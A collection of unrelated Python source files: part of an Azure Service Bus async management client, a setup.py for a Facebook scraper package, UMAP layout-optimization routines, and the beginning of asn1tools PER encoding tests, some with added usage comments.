entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
result = SubscriptionProperties._from_internal_entity(
name, entry.content.subscription_description)
return result
async def update_subscription(
self, topic: Union[str, TopicProperties], subscription: SubscriptionProperties, **kwargs
) -> None:
"""Update a subscription.
Before calling this method, you should use `get_subscription`, `create_subscription` or `list_subscriptions`
to get a `SubscriptionProperties` instance, then update the properties.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param ~azure.servicebus.management.SubscriptionProperties subscription: The subscription that is returned
from `get_subscription`, `create_subscription` or `list_subscriptions` and has the updated properties.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
to_update = subscription._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateSubscriptionBody(
content=CreateSubscriptionBodyContent(
subscription_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.subscription.put(
topic_name,
subscription.name,
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_subscription(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties], **kwargs
) -> None:
"""Delete a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription
to be deleted.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
await self._impl.subscription.delete(topic_name, subscription_name, api_version=constants.API_VERSION, **kwargs)
def list_subscriptions(
self, topic: Union[str, TopicProperties], **kwargs: Any) -> AsyncItemPaged[SubscriptionProperties]:
"""List the subscriptions of a ServiceBus Topic.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:returns: An iterable (auto-paging) response of SubscriptionProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.SubscriptionProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
def entry_to_subscription(entry):
subscription = SubscriptionProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
extract_data = functools.partial(
extract_data_template, SubscriptionDescriptionFeed, entry_to_subscription
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_subscriptions, topic_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_subscriptions_runtime_properties(
self, topic: Union[str, TopicProperties], **kwargs: Any) -> AsyncItemPaged[SubscriptionRuntimeProperties]:
"""List the subscriptions runtime information of a ServiceBus.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:returns: An iterable (auto-paging) response of SubscriptionRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.SubscriptionRuntimeProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
def entry_to_subscription(entry):
subscription = SubscriptionRuntimeProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
extract_data = functools.partial(
extract_data_template, SubscriptionDescriptionFeed, entry_to_subscription
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_subscriptions, topic_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule_name: str, **kwargs) -> RuleProperties:
"""Get the properties of a topic subscription rule.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the rule.
:param str rule_name: Name of the rule.
:rtype: ~azure.servicebus.management.RuleProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
entry_ele = await self._get_rule_element(topic_name, subscription_name, rule_name, **kwargs)
entry = RuleDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Rule('Topic: {}, Subscription: {}, Rule {}') does not exist".format(
subscription_name, topic_name, rule_name))
rule_description = RuleProperties._from_internal_entity(rule_name, entry.content.rule_description)
deserialize_rule_key_values(entry_ele, rule_description) # to remove after #3535 is released.
return rule_description
async def create_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
name: str, **kwargs) -> RuleProperties:
"""Create a rule for a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that will own the
to-be-created subscription rule.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
will own the to-be-created rule.
:param name: Name of the rule.
:type name: str
:keyword filter: The filter of the rule.
:type filter: Union[~azure.servicebus.management.CorrelationRuleFilter,
~azure.servicebus.management.SqlRuleFilter]
:keyword action: The action of the rule.
:type action: Optional[~azure.servicebus.management.SqlRuleAction]
:rtype: ~azure.servicebus.management.RuleProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
rule = RuleProperties(
name,
filter=kwargs.pop("filter", None),
action=kwargs.pop("action", None),
created_at_utc=None
)
to_create = rule._to_internal_entity()
create_entity_body = CreateRuleBody(
content=CreateRuleBodyContent(
rule_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
serialize_rule_key_values(request_body, rule)
with _handle_response_error():
entry_ele = await self._impl.rule.put(
topic_name,
subscription_name, # type: ignore
name,
request_body, api_version=constants.API_VERSION, **kwargs)
entry = RuleDescriptionEntry.deserialize(entry_ele)
result = RuleProperties._from_internal_entity(name, entry.content.rule_description)
deserialize_rule_key_values(entry_ele, result) # to remove after #3535 is released.
return result
async def update_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule: RuleProperties, **kwargs) -> None:
"""Update a rule.
Before calling this method, you should use `get_rule`, `create_rule` or `list_rules` to get a `RuleProperties`
instance, then update the properties.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns this rule.
:param ~azure.servicebus.management.RuleProperties rule: The rule that is returned from `get_rule`,
`create_rule`, or `list_rules` and has the updated properties.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
to_update = rule._to_internal_entity()
create_entity_body = CreateRuleBody(
content=CreateRuleBodyContent(
rule_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
serialize_rule_key_values(request_body, rule)
with _handle_response_error():
await self._impl.rule.put(
topic_name,
subscription_name,
rule.name,
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule: Union[str, RuleProperties], **kwargs) -> None:
"""Delete a topic subscription rule.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the rule.
:param Union[str, ~azure.servicebus.management.RuleProperties] rule: The to-be-deleted rule.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
try:
rule_name = rule.name # type: ignore
except AttributeError:
rule_name = rule
await self._impl.rule.delete(
topic_name, subscription_name, rule_name, api_version=constants.API_VERSION, **kwargs)
def list_rules(
self,
topic: Union[str, TopicProperties],
subscription: Union[str, SubscriptionProperties],
**kwargs: Any
) -> AsyncItemPaged[RuleProperties]:
"""List the rules of a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the rules.
:returns: An iterable (auto-paging) response of RuleProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.RuleProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
def entry_to_rule(ele, entry):
"""
`ele` will be removed after #3535 is released.
"""
rule = entry.content.rule_description
rule_description = RuleProperties._from_internal_entity(entry.title, rule)
deserialize_rule_key_values(ele, rule_description) # to remove after #3535 is released.
return rule_description
extract_data = functools.partial(
extract_rule_data_template, RuleDescriptionFeed, entry_to_rule
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_rules, topic_name, subscription_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_namespace_properties(self, **kwargs) -> NamespaceProperties:
"""Get the namespace properties
:rtype: ~azure.servicebus.management.NamespaceProperties
"""
entry_el = await self._impl.namespace.get(api_version=constants.API_VERSION, **kwargs)
namespace_entry = NamespacePropertiesEntry.deserialize(entry_el)
return NamespaceProperties._from_internal_entity(namespace_entry.title,
namespace_entry.content.namespace_properties)
async def close(self) -> None:
await self._impl.close()
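# --- Hedged usage sketch (not part of the SDK source above) ---
# A minimal illustration of how the async management client defined in this
# module might be driven. The import path and class name are assumptions
# (they follow the GA azure-servicebus layout and may differ in this snapshot),
# and the connection string / entity names are placeholders.
#
#     import asyncio
#     from datetime import timedelta
#     from azure.servicebus.aio.management import ServiceBusAdministrationClient
#
#     async def main():
#         async with ServiceBusAdministrationClient.from_connection_string("<CONNECTION_STR>") as client:
#             await client.create_queue("my-queue", max_delivery_count=5)
#             queue = await client.get_queue("my-queue")
#             queue.lock_duration = timedelta(minutes=2)
#             await client.update_queue(queue)
#             async for props in client.list_queues():
#                 print(props.name)
#             await client.delete_queue("my-queue")
#
#     asyncio.run(main())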
|
from setuptools import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='meta-scraper',
version='0.0.1',
description='Facebook (Meta) Scraper',
long_description=readme(),
classifiers = ['Programming Language :: Python',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Topic :: Utilities',
],
keywords='facebook meta pages reviews api sdk scraper parser extractor',
url='https://github.com/meta-scraper/facebook-scraper-python',
author='meta-scraper',
author_email='michael63s@protonmail.com',
license='MIT',
packages=['meta_scraper'],
install_requires=['requests'],
include_package_data=True,
zip_safe=False,
long_description_content_type='text/x-rst',
)
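# --- Hedged usage note (not part of the original setup script) ---
# With this file at the project root, the package can typically be installed
# locally with `pip install .` (or `pip install -e .` for development), and a
# source/wheel distribution built with the `build` package via `python -m build`.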
|
import numpy as np
import numba
import umap.distances as dist
from umap.utils import tau_rand_int
@numba.njit()
def clip(val):
"""Standard clamping of a value into a fixed range (in this case -4.0 to
4.0)
Parameters
----------
val: float
The value to be clamped.
Returns
-------
The clamped value, now fixed to be in the range -4.0 to 4.0.
"""
if val > 4.0:
return 4.0
elif val < -4.0:
return -4.0
else:
return val
@numba.njit(
"f4(f4[::1],f4[::1])",
fastmath=True,
cache=True,
locals={
"result": numba.types.float32,
"diff": numba.types.float32,
"dim": numba.types.int32,
},
)
def rdist(x, y):
"""Reduced Euclidean distance.
Parameters
----------
x: array of shape (embedding_dim,)
y: array of shape (embedding_dim,)
Returns
-------
The squared euclidean distance between x and y
"""
result = 0.0
dim = x.shape[0]
for i in range(dim):
diff = x[i] - y[i]
result += diff * diff
return result
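# --- Hedged illustration (not part of the library) ---
# rdist returns the *squared* Euclidean distance; for C-contiguous float32
# inputs (as required by the explicit numba signature above) it should agree
# with numpy up to rounding, e.g.:
#
#     x = np.array([0.0, 3.0], dtype=np.float32)
#     y = np.array([4.0, 0.0], dtype=np.float32)
#     rdist(x, y)            # -> 25.0
#     np.sum((x - y) ** 2)   # -> 25.0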
def _optimize_layout_euclidean_single_epoch(
head_embedding,
tail_embedding,
head,
tail,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma,
dim,
move_other,
alpha,
epochs_per_negative_sample,
epoch_of_next_negative_sample,
epoch_of_next_sample,
n,
):
for i in numba.prange(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_squared = rdist(current, other)
if dist_squared > 0.0:
grad_coeff = -2.0 * a * b * pow(dist_squared, b - 1.0)
grad_coeff /= a * pow(dist_squared, b) + 1.0
else:
grad_coeff = 0.0
for d in range(dim):
grad_d = clip(grad_coeff * (current[d] - other[d]))
current[d] += grad_d * alpha
if move_other:
other[d] += -grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i]) / epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_squared = rdist(current, other)
if dist_squared > 0.0:
grad_coeff = 2.0 * gamma * b
grad_coeff /= (0.001 + dist_squared) * (
a * pow(dist_squared, b) + 1
)
elif j == k:
continue
else:
grad_coeff = 0.0
for d in range(dim):
if grad_coeff > 0.0:
grad_d = clip(grad_coeff * (current[d] - other[d]))
else:
grad_d = 4.0
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
def optimize_layout_euclidean(
head_embedding,
tail_embedding,
head,
tail,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
parallel=False,
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_sample: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
parallel: bool (optional, default False)
Whether to run the computation using numba parallel.
Running in parallel is non-deterministic, and is not used
if a random seed has been set, to ensure reproducibility.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
optimize_fn = numba.njit(
_optimize_layout_euclidean_single_epoch, fastmath=True, parallel=parallel
)
for n in range(n_epochs):
optimize_fn(
head_embedding,
tail_embedding,
head,
tail,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma,
dim,
move_other,
alpha,
epochs_per_negative_sample,
epoch_of_next_negative_sample,
epoch_of_next_sample,
n,
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % max(1, int(n_epochs / 10)) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
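# --- Hedged usage sketch (illustrative only) ---
# In UMAP proper the arrays below come from the fuzzy simplicial set
# construction; the edge lists, epochs_per_sample weights and the a/b curve
# parameters here are made-up toy values just to show the call shape.
#
#     rs = np.random.RandomState(0)
#     emb = rs.normal(size=(4, 2)).astype(np.float32)
#     head = np.array([0, 1, 2], dtype=np.int32)          # edge sources
#     tail = np.array([1, 2, 3], dtype=np.int32)          # edge targets
#     eps = np.ones(3, dtype=np.float64)                  # sample every edge each epoch
#     rng_state = rs.randint(-2**31, 2**31 - 1, 3).astype(np.int64)
#     emb = optimize_layout_euclidean(
#         emb, emb, head, tail, n_epochs=50, n_vertices=4,
#         epochs_per_sample=eps, a=1.58, b=0.9, rng_state=rng_state,
#     )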
@numba.njit(fastmath=True)
def optimize_layout_generic(
head_embedding,
tail_embedding,
head,
tail,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
output_metric=dist.euclidean,
output_metric_kwds=(),
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_sample: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
for n in range(n_epochs):
for i in range(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
_, rev_grad_dist_output = output_metric(
other, current, *output_metric_kwds
)
if dist_output > 0.0:
w_l = pow((1 + a * pow(dist_output, 2 * b)), -1)
else:
w_l = 1.0
grad_coeff = 2 * b * (w_l - 1) / (dist_output + 1e-6)
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
if move_other:
grad_d = clip(grad_coeff * rev_grad_dist_output[d])
other[d] += grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i])
/ epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
if dist_output > 0.0:
w_l = pow((1 + a * pow(dist_output, 2 * b)), -1)
elif j == k:
continue
else:
w_l = 1.0
grad_coeff = gamma * 2 * b * w_l / (dist_output + 1e-6)
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % max(1, int(n_epochs / 10)) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
@numba.njit(fastmath=True)
def optimize_layout_inverse(
head_embedding,
tail_embedding,
head,
tail,
weight,
sigmas,
rhos,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
output_metric=dist.euclidean,
output_metric_kwds=(),
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
weight: array of shape (n_1_simplices)
The membership weights of the 1-simplices.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_sample: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
for n in range(n_epochs):
for i in range(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
w_l = weight[i]
grad_coeff = -(1 / (w_l * sigmas[j] + 1e-6))
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
if move_other:
other[d] += -grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i])
/ epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
# w_l = 0.0 # for negative samples, the edge does not exist
w_h = np.exp(-max(dist_output - rhos[k], 1e-6) / (sigmas[k] + 1e-6))
grad_coeff = -gamma * ((0 - w_h) / ((1 - w_h) * sigmas[k] + 1e-6))
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % max(1, int(n_epochs / 10)) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from .utils import Asn1ToolsBaseTest
import asn1tools
import sys
from copy import deepcopy
sys.path.append('tests/files')
sys.path.append('tests/files/3gpp')
sys.path.append('tests/files/oma')
from rrc_8_6_0 import EXPECTED as RRC_8_6_0
from s1ap_14_4_0 import EXPECTED as S1AP_14_4_0
from x691_a4 import EXPECTED as X691_A4
from ulp import EXPECTED as OMA_ULP
class Asn1ToolsPerTest(Asn1ToolsBaseTest):
maxDiff = None
def test_boolean(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BOOLEAN "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b BOOLEAN "
"} "
"END",
'per')
datas = [
('A', True, b'\x80'),
('A', False, b'\x00'),
('B', {'a': False, 'b': False}, b'\x00'),
('B', {'a': True, 'b': False}, b'\x80'),
('B', {'a': False, 'b': True}, b'\x40'),
('B', {'a': True, 'b': True}, b'\xc0')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'')
self.assertEqual(str(cm.exception),
'A: out of data (At bit offset: 0)')
def test_integer(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= INTEGER "
"B ::= INTEGER (5..99) "
"C ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER, "
" c BOOLEAN, "
" d INTEGER (-10..400) "
"} "
"D ::= INTEGER (0..254) "
"E ::= INTEGER (0..255) "
"F ::= INTEGER (0..256) "
"G ::= INTEGER (0..65535) "
"H ::= INTEGER (0..65536) "
"I ::= INTEGER (0..10000000000) "
"J ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER (0..254), "
" c INTEGER (0..255), "
" d BOOLEAN, "
" e INTEGER (0..256) "
"} "
"K ::= B (6..7) "
"L ::= SEQUENCE { "
" a K (7..7) "
"} "
"M ::= INTEGER (5..99, ..., 101..105) "
"N ::= INTEGER (0..65535) "
"O ::= INTEGER (0..65536) "
"P ::= INTEGER (0..2147483647) "
"Q ::= INTEGER (0..4294967295) "
"R ::= INTEGER (0..4294967296) "
"S ::= SEQUENCE { "
" a BOOLEAN, "
" b INTEGER (-10000..704000000000000001), "
" c BOOLEAN "
"} "
"END",
'per')
datas = [
('A', 32768, b'\x03\x00\x80\x00'),
('A', 32767, b'\x02\x7f\xff'),
('A', 256, b'\x02\x01\x00'),
('A', 255, b'\x02\x00\xff'),
('A', 128, b'\x02\x00\x80'),
('A', 127, b'\x01\x7f'),
('A', 2, b'\x01\x02'),
('A', 1, b'\x01\x01'),
('A', 0, b'\x01\x00'),
('A', -1, b'\x01\xff'),
('A', -128, b'\x01\x80'),
('A', -129, b'\x02\xff\x7f'),
('A', -256, b'\x02\xff\x00'),
('A', -32768, b'\x02\x80\x00'),
('A', -32769, b'\x03\xff\x7f\xff'),
('B', 5, b'\x00'),
('B', 6, b'\x02'),
('B', 99, b'\xbc'),
('C',
{'a': True, 'b': 43554344223, 'c': False, 'd': -9},
b'\x80\x05\x0a\x24\x0a\x8d\x1f\x00\x00\x01'),
('D', 253, b'\xfd'),
('E', 253, b'\xfd'),
('F', 253, b'\x00\xfd'),
('G', 253, b'\x00\xfd'),
('H', 253, b'\x00\xfd'),
('H', 256, b'\x40\x01\x00'),
('H', 65536, b'\x80\x01\x00\x00'),
('I', 0, b'\x00\x00'),
('I', 1, b'\x00\x01'),
('I', 10000000000, b'\x80\x02\x54\x0b\xe4\x00'),
('J',
{'a': False, 'b': 253, 'c': 253, 'd': False, 'e': 253},
b'\x7e\x80\xfd\x00\x00\xfd'),
('K', 7, b'\x80'),
('L', {'a': 7}, b''),
('M', 103, b'\x80\x01\x67'),
('N', 1, b'\x00\x01'),
('N', 255, b'\x00\xff'),
('N', 256, b'\x01\x00'),
('N', 65535, b'\xff\xff'),
('O', 1, b'\x00\x01'),
('O', 255, b'\x00\xff'),
('O', 256, b'\x40\x01\x00'),
('O', 65535, b'\x40\xff\xff'),
('O', 65536, b'\x80\x01\x00\x00'),
('P', 1, b'\x00\x01'),
('P', 255, b'\x00\xff'),
('P', 256, b'\x40\x01\x00'),
('P', 65535, b'\x40\xff\xff'),
('P', 65536, b'\x80\x01\x00\x00'),
('P', 16777215, b'\x80\xff\xff\xff'),
('P', 16777216, b'\xc0\x01\x00\x00\x00'),
('P', 100000000, b'\xc0\x05\xf5\xe1\x00'),
('Q', 4294967295, b'\xc0\xff\xff\xff\xff'),
('R', 4294967296, b'\x80\x01\x00\x00\x00\x00'),
('S',
{'a': True, 'b': 0, 'c': True},
b'\x90\x27\x10\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
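# --- Hedged worked example (derived from the data above, not from the spec text) ---
# For B ::= INTEGER (5..99) the constrained range has 95 values, so aligned PER
# encodes the offset from the lower bound in a 7-bit field, left-aligned and
# padded to a whole byte at the top level:
#
#     value 6  -> offset 1  -> 0b0000001 + pad -> 0x02
#     value 99 -> offset 94 -> 0b1011110 + pad -> 0xbc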
def test_real(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= REAL "
"B ::= SEQUENCE { "
" a REAL, "
" ... "
"}"
"END",
'per')
datas = [
('A', 0.0, b'\x00'),
('A', -0.0, b'\x00'),
('A', float('inf'), b'\x01\x40'),
('A', float('-inf'), b'\x01\x41'),
('A', 1.0, b'\x03\x80\x00\x01'),
('B', {'a': 1.0}, b'\x00\x03\x80\x00\x01'),
('B',
{'a': 1000000000},
b'\x00\x05\x80\x09\x1d\xcd\x65')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_bit_string(self):
foo = asn1tools.compile_string(
